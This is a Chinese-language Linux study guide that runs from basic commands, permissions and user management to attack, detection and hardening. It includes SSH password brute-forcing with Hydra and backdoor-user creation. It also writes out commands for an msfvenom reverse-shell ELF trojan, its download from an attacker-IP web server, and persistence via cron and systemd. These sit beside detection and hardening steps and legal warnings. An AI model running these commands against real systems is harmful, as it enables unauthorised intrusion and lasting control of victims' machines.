Linux 操作系统

发布时间:2026/7/2 8:14:46

Linux 操作系统 中华人民共和国网络安全法任何个人和组织不得从事非法侵入他人网络干扰他人网络正常功能 窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络 干扰网络正常功能及防护措施窃取网络数据等危害网络安全活动的 程序工具:明知他人从事危害网络安全的活动的,不得为其提供技术 支持广告推广支付结算等帮助一、Linux 系统基础认知核心概念内核是系统核心1991 年林纳斯・托瓦兹开发发行版是 “内核 配套软件” 的完整系统具备开源免费特性安全性和灵活性更高。无盘符划分、命令行是核心操作方式、权限管理严格与 Windows 形成核心区别。核心适用场景服务器最主要、桌面端、嵌入式设备。主流发行版发行版核心特点适用场景Ubuntu桌面友好、生态完善、社区支持强入门学习、日常使用Kali Linux预装 MSF、Hydra 等网安工具网络安全学习、渗透测试CentOS稳定、兼容 RedHat、运维友好服务器部署、企业应用核心目录结构Linux 采用单根目录结构关键目录功能/bin普通用户可执行的二进制文件/sbin仅 root 可执行的系统命令/etc系统核心配置文件目录/home普通用户主目录/root超级用户目录/var存放日志、缓存等动态变化数据/tmp临时文件目录/usr共享系统资源/dev设备文件目录二、Linux 命令行核心操作一基础操作与快捷键打开终端Ubuntu 按CtrlAltTKali 桌面有快捷图标命令格式命令 [选项] [参数]如ls -l /home。必备快捷键Tab自动补全命令 / 路径、CtrlC终止当前命令、CtrlL清空屏幕、上下箭头查看历史命令。二文件与目录操作命令功能关键示例pwd查看当前目录路径pwd输出/home/ubuntuls列出目录内容ls -l详细列表、ls -a显示隐藏文件cd切换目录cd /home绝对路径、cd ../返回上一级mkdir创建目录mkdir -p a/b/c递归创建多级目录touch创建空文件touch test.txtcp复制文件 / 目录cp -r a/ /home复制目录需加-rmv移动 / 重命名mv test.txt new.txt重命名rm删除文件 / 目录rm -rf a/强制删除目录谨慎使用cat/more/less查看文件内容more /var/log/syslog分页查看大文件三权限管理权限表示共 10 位第 1 位为文件类型-普通文件、d目录、l链接2-4 位所有者权限、5-7 位所属组权限、8-10 位其他用户权限权限符r读、w写、x执行。数字表示法r4、w2、x1权限值为对应数字之和如rwx7、r-x5、r--4。修改命令chmod支持符号法和数字法如chmod uw test.txt给所有者加写权限、chmod 755 test.txt所有者 rwx、组 r-x、其他 r--、chmod -R 777 /dir递归修改目录权限谨慎使用。修改所有者chown 用户:用户组 文件名如chown root:root test.txt。四用户与组管理用户分类root 用户UID0最高权限、系统用户UID1-999服务专用、普通用户UID≥1000手动创建。核心命令命令功能useradd/test创建普通用户passwd test给用户设置密码输入不显示su test/sudo su切换普通用户 / 切换 root 用户userdel -r test删除用户并删除其主目录groupadd testGroup创建用户组usermod -g testGroup test将用户加入指定组sudo 权限修改/etc/sudoers文件添加用户名 ALL(ALL:ALL) ALL可让普通用户执行 root 权限命令。五系统配置与进程管理网络操作查看 IPifconfig/ip addr测试连通性ping 目标IP/域名CtrlC终止查看端口占用netstat -tulnp/ss -tulnp推荐ss新版 Linux 默认支持包管理器软件安装 / 卸载操作Debian 系列Ubuntu/KaliRedHat 系列CentOS更新源 / 索引apt updateyum clean all yum makecache安装软件apt install 软件名yum install 软件名卸载软件apt remove 软件名yum remove 软件名升级软件apt upgradeyum upgrade3.进程管理命令功能ps -ef查看所有进程详细信息top实时查看进程资源占用按q退出kill -9进程ID强制终止指定进程pkill -f 进程名按进程名终止进程六文件编辑与日志查看Vim 编辑器打开 / 创建文件vim test.txt按i进入插入编辑模式Esc退出编辑模式保存退出:wq强制退出不保存:q!快捷键dd删除当前行、yy复制当前行、p粘贴、:/关键词查找内容n下一个、N上一个日志查看核心命令实时查看tail -f /var/log/syslog系统日志、tail -f /var/log/auth.log登录日志筛选内容grep error /var/log/syslog查找包含 error 的日志查看指定行数tail -n 100 /var/log/auth.log查看最后 100 行三、Linux 系统服务安全攻击与渗透基础SSH 服务远程操作核心协议类似 Windows 的 RDP命令行形式默认端口 22。安装apt install openssh-serverUbuntu配置 root 远程登录修改/etc/ssh/sshd_config设置PermitRootLogin yes、PasswordAuthentication yes重启服务service ssh restartSSH 弱口令爆破使用 Hydra 工具Kali 预装命令hydra -l 用户名 -P 密码字典路径 ssh://目标IP仅可在授权设备上使用非法操作违法。植入后门用户创建用户useradd -m 用户名→设置密码passwd 用户名→配置 sudo 权限修改/etc/sudoers可实现长期控制。四、Linux 木马入侵与持久化控制一木马制作与植入Kali 目标机联动制作木马使用 MSF 框架Metasploit生成 ELF 格式木马msfvenom -p linux/x64/shell/reverse_tcp LHOST攻击机IP LPORT端口 -f elf -o shell.elf启动 MSF 监听msfconsole→use exploit/multi/handler→设置 payload/IP/ 端口→run。植入木马攻击机启动 Apache 服务service apache2 start将木马放入/var/www/html目标机通过wget http://攻击机IP/shell.elf -O shell.elf下载。运行木马给木马加执行权限chmod x shell.elf执行./shell.elf攻击机即可获取目标机 shell。二持久化控制手段手段配置方式特点计划任务Croncrontab -e编辑格式* * * * * 命令/脚本路径分 / 时 / 日 / 月 / 周定时执行木马如* * * * * /shell.elf每分钟执行系统启动项放入/etc/init.d/目录开机一次性执行崩溃后无法自动恢复系统服务systemd创建/etc/systemd/system/xxx.service配置文件设置Restartalways持久化终极方案崩溃自动重启开机自启服务配置核心命令systemctl daemon-reload重载配置、systemctl start/enable 服务名启动 / 开机自启、systemctl status 服务名查看状态。五、Linux 木马入侵检测从日志、账户、进程、网络、计划任务、服务 / 启动项6 个维度排查核心命令和方法如下日志排查查看系统日志cat /var/log/syslog、登录日志cat /var/log/auth.log使用journalctl精准筛选如journalctl -u ssh查看 SSH 日志、journalctl --since 时间 --until 时间查看指定时段日志。审计工具 auditd内核级审计监控敏感操作如创建用户安装apt install -y auditd→启动systemctl start auditd监控useradd命令auditctl -w /usr/sbin/useradd -p x -k useradd_exec→查看记录ausearch -k useradd_exec。可疑账户排查查看 sudo 权限用户more /etc/sudoers | grep -v ^#\|^$ | grep ALL(ALL)查看 UID0 的超级用户awk -F: $30{print $1} /etc/passwd处理强制下线pkill -KILL -u 用户名、禁用usermod -L 用户名、删除userdel -r 用户名。可疑进程排查实时查看top按 CPU / 内存排序ps aux --sort -pcpu/ps aux --sort -pmem终止可疑进程kill -9 进程IDCPU / 内存占用异常高的无名进程大概率是挖矿 / 木马程序。网络连接排查查看可疑端口 / 连接netstat -anop -A inet或ss -ntap推荐ss重点关注陌生 IP 的 ESTABLISHED 状态连接。计划任务 / 启动项 / 服务排查计划任务crontab -l -u 用户名查看、crontab -r -u 用户名删除启动项ls /etc/init.d/Ubuntu、chkconfig --listCentOS服务systemctl list-unit-files --typeservice --stateenabled查看已启用的服务。六、Linux 系统安全加固从账户、SSH、防火墙、系统、权限5 个核心维度加固兼顾 Ubuntu 和 CentOS核心操作如下账户加固删除陌生 / 无用账户userdel 用户名给 root 设置强密码passwd root定期检查用户组和 sudo 权限。SSH 加固修改/etc/ssh/sshd_config设置PermitRootLogin no禁止 root 远程登录重启服务systemctl restart sshd。防火墙加固启用并仅开放必要端口操作UbuntuufwCentOSfirewalld启用并开机自启ufw enablesystemctl start firewalld systemctl enable firewalld允许 SSH22 端口ufw allow 22/tcpfirewall-cmd --permanent --add-port22/tcp firewall-cmd --reload拒绝未明确允许的入站ufw default deny incomingfirewall-cmd --permanent --set-targetDROP firewall-cmd --reload查看状态 / 规则ufw statusfirewall-cmd --list-all4.系统加固关闭无用服务systemctl disable 服务名定期更新系统Ubuntuapt update apt upgrade -yCentOSyum update -y重启使内核更新生效。5.权限加固限制敏感目录 / 文件权限如chmod 700 /root/仅 root 可读写执行避免随意使用chmod 777、rm -rf等高危命令。七、学习与操作注意事项命令学习多实操记忆避免死记硬背遇问题可查命令帮助命令 --help。高危命令rm -rf强制删除、chmod 777全权限需谨慎使用防止误删系统文件或过度开放权限。学习顺序先掌握文件操作、命令行基础再逐步学习权限管理、系统配置最后结合安全场景学习攻击与加固。法律红线未经授权的 SSH 爆破、木马植入、系统控制等操作均违反《网络安全法》仅可在自有 / 授权设备上进行测试。

相关新闻